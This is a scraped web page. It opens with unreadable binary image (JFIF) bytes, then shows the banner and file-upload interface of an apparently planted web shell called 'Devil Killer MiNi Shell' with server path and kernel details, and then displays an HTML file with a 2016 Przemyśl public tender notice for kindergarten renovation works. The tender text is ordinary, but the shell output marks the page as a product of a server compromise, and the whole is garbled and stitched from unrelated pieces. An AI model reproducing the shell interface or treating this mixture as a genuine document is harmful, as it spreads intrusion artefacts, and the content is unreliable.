JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160325/31161-N-2016.html

<p class="kh_header"><b>Przemyśl: Unowocześnienie bazy Przedszkola nr 2 w Przemyślu</b><br>
<b>Numer ogłoszenia: 31161 - 2016; data zamieszczenia: 25.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Przemyśl - Prezydent Miasta Przemyśl , ul. Rynek 1, 37-700 Przemyśl, woj. podkarpackie, tel. 016 6782962, 6752072, faks 016 6786449.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Unowocześnienie bazy Przedszkola nr 2 w Przemyślu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie w systemie zaprojektuj i wybuduj, placu zabaw oraz przebudowy wejścia głównego i patio, remontu ogrodzenia, montaż monitoringu wizyjnego, wymiana oświetlenia wewnętrznego w Przedszkolu nr 2 przy ul. Bartosza Głowackiego 17 w Przemyślu na działkach nr 1701, 1720, 1728, 1755, 1773 obr. 207 w ramach Budżetu Obywatelskiego miasta Przemyśla.
1.1. Zakres zamówienia obejmuje:
1) opracowanie dokumentacji projektowej wraz z uzyskaniem wszelkich wymaganych uzgodnień i pozwolenia na budowę lub zaświadczenie o braku sprzeciwu wobec zgłoszenia zamiaru wykonania robót budowlanych, w imieniu Zamawiającego/Inwestora,
2) wykonanie robót w następującym zakresie:
a) wykonanie placu zabaw:
- montaż urządzeń zabawowych, 
- montaż ławek z oparciem, 
- montaż koszy na śmiecie,
- montaż tablic informacyjnych, 
- wykonanie bezpiecznej nawierzchni-żwirowej,
- uzupełnienie trawników,  
b) przebudowa wewnętrznego patio:
- częściowa rozbiórka murów ceglanych,
- rozbiórka elementów cieku z kamieni naturalnych,
- zasypanie niecki fontanny,
- remont schodów z ułożeniem okładziny ceramicznej,
- montaż balustrady,
- wykonanie podbudowy i nawierzchni bezpiecznej z elementów gumowych (typ puzzle) ,
- wykonanie odwodnienia nawierzchni z przełożeniem odcinka instalacji wodociągowej. 
c) przebudowa wejścia głównego do budynku:
- rozbiórka schodów żelbetowych wraz częściową rozbiórką spocznika (skrócenie długości),
- wykonanie nowej konstrukcji schodów i spocznika wraz z ułożeniem okładziny (np.
 płytki ceramiczne gress, kostka betonowa),
- zmiana konstrukcji nośnej i poszycia daszku z jednospadowego na dwuspadowy wraz z  montażem systemu odwadniającego,
- wymiana balustrady,
- wykonanie pochylni stalowej dla osób niepełnosprawnych,
- wykonanie płyty odbojowej wraz z ułożeniem chodnika z kostki betonowej.
d) remont istniejącego ogrodzenia:
- wymiana zniszczonych elementów betonowych cokołu wraz z renowacją pozostałych,
- wymiana uszkodzonych stalowych ram ogrodzeniowych, 
- odnowienie stalowych ram ogrodzeniowych,
- wymiana bramy i dwóch furtek ogrodzeniowych na nowe,
e) wymiana opraw oświetleniowych w pomieszczeniach przedszkola,
f) montaż monitoringu wizyjnego zewnętrznego,
g) wywiezienie i zagospodarowanie we własnym zakresie nadmiaru ziemi z wykopów,
h) wykonanie niezbędnych robót towarzyszących oraz innych robót wynikających 
z technologii robót i sztuki budowlanej.
3) zapewnienie pełnej obsługi geodezyjnej w trakcie realizacji zadania oraz do wykonania inwentaryzacji powykonawczej.
4) przygotowanie dokumentów związanych z przekazaniem zadania do użytkowania.  
1.2. Szczegółowy zakres zamówienia opisują załączone Programy funkcjonalno - użytkowe - załącznik nr 1 i załącznik nr 2 do SIWZ.
2. Zakres prac projektowych i robót budowlanych został opisany w Programach funkcjonalno-użytkowych, które zostały opracowane na podstawie rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczególnego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych stanowiących załącznik nr 1 i załącznik nr 2 do SIWZ. 
Zamawiający informuje, że Programy funkcjonalno - użytkowe stanowią wytyczne 
do projektowania, w związku, z czym dopuszcza się dokonywanie w fazie projektowania niezbędnych zmian programu proponowanych przez Wykonawcę, po uzyskaniu akceptacji Zamawiającego oraz służą do ustalenia planowanych kosztów prac projektowych i robót budowlanych i przygotowania oferty szczególnie w zakresie obliczenia ceny oferty oraz wykonania prac projektowych. Wszelkie odstępstwa od Programów funkcjonalno - użytkowych nie będą wpływać na wartość niniejszego zamówienia publicznego. 
3. Etap I - Wykonanie dokumentacji projektowej - wymagania dotyczące Wykonawcy: 
1) Wykonawca przed przystąpieniem do opracowania dokumentacji projektowej, musi uzyskać mapę do celów projektowych,
2) w celu opracowania dokumentacji projektowej, Zamawiający umożliwi Wykonawcy wstęp na teren funkcjonującego przedszkola, 
3) po wykonaniu wstępnych założeń i rozwiązań projektowych, Wykonawca zobowiązany jest do przedstawienia ich Zamawiającemu w celu uzgodnienia i zatwierdzenia,
4) wytycznymi do projektowania jest załączony Program funkcjonalno-użytkowy, w związku, z czym dopuszcza się dokonywanie w fazie projektowania niezbędnych zmian programu, proponowanych przez Wykonawcę po uprzednim uzyskaniu akceptacji ze strony Zamawiającego. Wszelkie odstępstwa od Programu funkcjonalno-użytkowego nie mogą wpływać na wartość zamówienia. 
5) Dokumentacja projektowa wielobranżowa winna być wykonana w stanie kompletnym  z punktu widzenia celu, któremu ma służyć z niezbędnymi uzgodnieniami oraz zgodnie z obowiązującymi przepisami  i normami, w tym:
a) ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2013 r. poz. 1409 z późn. zm. z późn. zm.), 
b) rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r.,  Nr 75,, poz. 690 z późn. zm.), 
c) rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 
25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r, poz. 462 z późn. zm.), 
d) rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r., poz. 1129 z późn. zm.), 
6) Dokumentacja winna zawierać niezbędne uzgodnienia i pozwolenie Wojewódzkiego Podkarpackiego Konserwatora Zabytków z siedzibą w Przemyślu na prowadzenie prac przy zabytku - teren znajduje się w strefie ochrony układu urbanistycznego miasta Przemyśla,
7) Wykonawca winien uzyskać pozwolenie na budowę i zatwierdzenie projektu budowlanego stanowiącego załącznik do pozwolenia na budowę lub zaświadczenie o braku sprzeciwu wobec zgłoszenia zamiaru wykonania robót budowlanych,
8) Dokumentacja musi być zaopatrzona w pisemne oświadczenie, że jest kompletna z punktu widzenia celu, któremu ma służyć, zgodna z obowiązującymi w tym zakresie przepisami oraz zasadami wiedzy technicznej,
9) jeżeli w trakcie realizacji robót zgodnie z opracowaną dokumentacją projektową, zajdzie konieczność wykonania dodatkowej dokumentacji uzupełniającej, niezbędnej dla realizacji robót - Wykonawca wykona tę dokumentację na własny koszt,
10) Wykonawca zobowiązany jest do bieżącego uzgadniania opracowań projektowych 
i uzyskania akceptacji Zamawiającego opracowanej dokumentacji projektowej przed złożeniem wniosku o pozwolenie na budowę lub wniosku zgłoszenia budowy obiektów/robót budowlanych nie wymagających pozwolenia na budowę,
11) Dokumentacja projektowa musi zawierać:
- projekt budowlano-wykonawczy z zagospodarowaniem terenu, opisem technicznym 
i rysunkami szczegółowymi elementów budowlanych - 5 egz.,
 - specyfikację techniczną wykonania i odbioru robót - 2 egz.,
 - przedmiar robót wraz z kosztorysem - 2 egz.
Dokumentacja oprócz wersji papierowej winna być wykonana po jednym egzemplarzu 
w wersji elektronicznej ogólnodostępnej.
4. Etap II - Wykonanie robót budowlanych - wymagania dotyczące Wykonawcy:
1) przedłożenie Zamawiającemu, jako załącznika do umowy, harmonogramu rzeczowo - finansowego sporządzonego z uwzględnieniem zapisów projektu umowy (załącznik nr 10 do SIWZ), a w szczególności § 4 i § 6 oraz w uzgodnieniu z Zamawiającym i po akceptacji Zamawiającego realizacji zamówienia, przed podpisaniem umowy. Nie przedłożenie harmonogramu lub nie uwzględnienie w harmonogramie uwag wniesionych przez Zamawiającego na etapie zatwierdzania przedłożonego harmonogramu - skutkować będzie nie podpisaniem umowy z Wykonawcą z winy Wykonawcy,
2) ze względu na bieżące użytkowanie przedszkola, przejęcie od Zamawiającego placu budowy do 7 dni po uzyskaniu pozwolenia na budowę,
3) zabezpieczenie we własnym zakresie niezbędnych mediów do realizacji zamówienia (energia elektryczna, woda itp.) oraz pokrywanie ich kosztów,
4) zapewnienie własnego zaplecza budowy,
5) zapewnienie ochrony placu budowy i zabezpieczenie istniejących urządzeń przed uszkodzeniem we własnym zakresie,
6) sporządzenie planu bezpieczeństwa i ochrony zdrowia,
7) dokonywanie przy udziale lub z upoważnienia Zamawiającego niezbędnych zawiadomień i zgłoszeń, 
8) zapewnienie kierownika budowy, kierownika robót energetycznych oraz nadzoru autorskiego projektantów w cenie oferty, 
9) wykonanie robót budowlanych na podstawie opracowanej i zatwierdzonej dokumentacji
projektowej zgodnie z: pozwoleniem na budowę lub innym dokumentem, o którym mowa w pkt 3 ppkt 7, pozwoleniem konserwatora zabytków, obowiązującymi przepisami, normami, zasadami wiedzy technicznej i Specyfikacją istotnych warunków zamówienia,
10) przeprowadzenie wymaganych prób, badań i pomiarów,
11) wykonanie robót pomocniczych, przygotowawczych i porządkowych oraz naprawa 
ewentualnych uszkodzeń,
12) zapewnienie prowadzenia obsługi geodezyjnej i wykonanie powykonawczej inwentaryzacji geodezyjnej oraz ponoszenie z tym związanych opłat,
13) zagospodarowanie terenu budowy,
14) zagospodarowanie we własnym zakresie nadmiaru ziemi powstałej podczas wykonywania robót budowlanych, 
15) należyte zabezpieczenie i oznakowanie terenu objętego prowadzonymi robotami budowlanymi,
16) przygotowanie dokumentów wymaganych przepisami prawa związanych z oddaniem zadania do użytkowania na dzień rozpoczęcia odbioru,
17) stosowania przy wykonywaniu robót budowlanych materiałów i wyrobów, które zostały dopuszczone do obrotu i stosowania w budownictwie, zgodnie z przepisami ustawy z 16 kwietnia 2004 r. (t. j. Dz. U. z 2004 r., Nr 92, poz. 881 z późn. zm.) o wyrobach budowlanych,
18) utrzymania porządku i ochrony mienia znajdującego się na terenie budowy i terenach przyległych, Wykonawca zobowiązany jest utrzymywać teren budowy bez przeszkód komunikacyjnych, oraz usuwać na bieżąco zbędne materiały, odpady i śmieci oraz ponieść koszty z tym związane. Wykonawca jest zobowiązany do naprawy wszelkich uszkodzeń powstałych w obrębie placu budowy w okresie od dnia przekazania placu budowy Wykonawcy do dnia uzyskania pozwolenia na użytkowanie,
19) prowadzenia robót pod stałym nadzorem technicznym, z zachowaniem obowiązujących przepisów w tym bhp i p.poż.
5. Zamawiający zaleca dokonania wizji lokalnej w terenie.
6. Okres gwarancji:
1) Wykonawca udzieli Zamawiającemu gwarancji. Zamawiający zrównuje okres gwarancji i rękojmi. 
2) początkiem okresu gwarancyjnego jest data podpisania protokołu odbioru. 
3) Wykonawca w okresie trwania gwarancji zobowiązany jest do:
- bezpłatnego dokonywania przeglądów oraz,
- bezpłatnego dokonywania konserwacji i serwisu oraz,
- ewentualną naprawę lub regulację
wszystkich wbudowanych elementów (materiałów) i urządzeń.
7. Na podstawie art. 29 ust. 4 oraz w związku z art. 36 ust. 2 pkt 9 lid. d ustawy Pzp Zamawiający wymaga zatrudnienia na podstawie umowy o pracę w rozumieniu przepisu 
art. 22 § 1 ustawy Kodeks pracy (t. j. Dz. U. z 2015 r., poz. 1502 z późn. zm.) przez Wykonawcę, co najmniej 5 osób wykonujących czynności w trakcie realizacji zamówienia na roboty budowalne, o których mowa w pkt 4 tj. etapu dot. wykonania robót budowlanych. Wymagania w zakresie zatrudnienia nie dotyczą faktu zatrudnienia określonych grup pracowników w ogóle, ale zatrudnienia ich do realizacji zamówienia. Nie może stanowić spełnienie warunku określonego w rozdz. 2 pkt 1.3. SIWZ samo tylko zatrudnienie pracowników, które następnie nie będą uczestniczyli w wykonywaniu zamówienia. Na żądanie Zamawiającego Wykonawca przedłoży dowody zatrudnienia osób na umowy o pracę wskazanych w załączniku do umowy (stanowiącym załącznik nr 11 do SIWZ) oraz czynności, które będą wykonywane przez te osoby w ramach realizacji przedmiotowego zamówienia.
W sytuacji, gdy dana osoba w okresie realizacji zamówienia rozwiąże umowę lub gdy uczyni to Wykonawca, zobowiązany jest on to zatrudnienia w miejsce tej osoby, innej osoby. Z tytułu niespełnienia wymagań w zakresie zatrudnienia pracowników na umowę o pracę Wykonawca zapłaci kary umowne, o których mowa w § 13 ust. 1 projektu umowy (załącznik nr 10 do SIWZ).
8. Wybrany Wykonawca zobowiązany jest dostarczyć Zamawiającemu przed podpisaniem umowy:
a) kopę aktualnej polisy ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności obejmującej okres realizacji przedmiotu zamówienia na kwotę nie niższą niż wartość zamówienia oraz z terminem ważności obejmujący okres realizacji zamówienia, potwierdzoną przez Wykonawcę za zgodność z oryginałem,
b) harmonogram rzeczowo - finansowy, o którym mowa w pkt 4 ppkt 1),
c) kopie dokumentów potwierdzających uprawnienia osób, które będą uczestniczyć 
w wykonywaniu zamówienia,
d) kopię dokumentów potwierdzających przynależność do właściwej izby samorządu zawodowego osób, które będą uczestniczyć w wykonywaniu zamówienia.
Nie przedłożenie ww. skutkować będzie nie podpisaniem umowy z Wykonawcą z winy Wykonawcy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.12.00-2, 45.31.23.20-6, 45.26.10.00-4, 45.26.23.10-7, 45.26.23.11-4, 45.23.32.22-1, 45.34.20.00-6, 45.11.27.23-9, 37.53.52.00-9, 71.22.00.00-6, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca będzie dysponował:
a) min. 1 osobą z uprawnieniami do projektowania w branży architektonicznej, pełniącą jednocześnie funkcję kierownika projektu,
b) min. 1 osobą z uprawnieniami do projektowania w branży konstrukcyjno - budowlanej,
c) min. 1 osobą z uprawnieniami do projektowania w branży instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych,
d) min. 1 osobą z uprawnieniami budowlanymi w specjalności konstrukcyjno - budowlanej do pełnienia funkcji kierownika budowy,
e) min. 1 osobą z uprawnieniami budowlanymi do kierowania robotami w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy Formularz oferty według wzoru stanowiącego załącznik nr 3 do SIWZ,
2) pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę o ile osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jej reprezentacji we właściwym rejestrze,
3) pełnomocnictwo, o którym mowa w pkt 5.1,
4) formularz cenowy stanowiący załącznik nr 3 A do SIWZ,
5) wykaz osób zatrudnionych na podstawie umowy o pracę - załącznik nr 11 do SIWZ,
6) dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
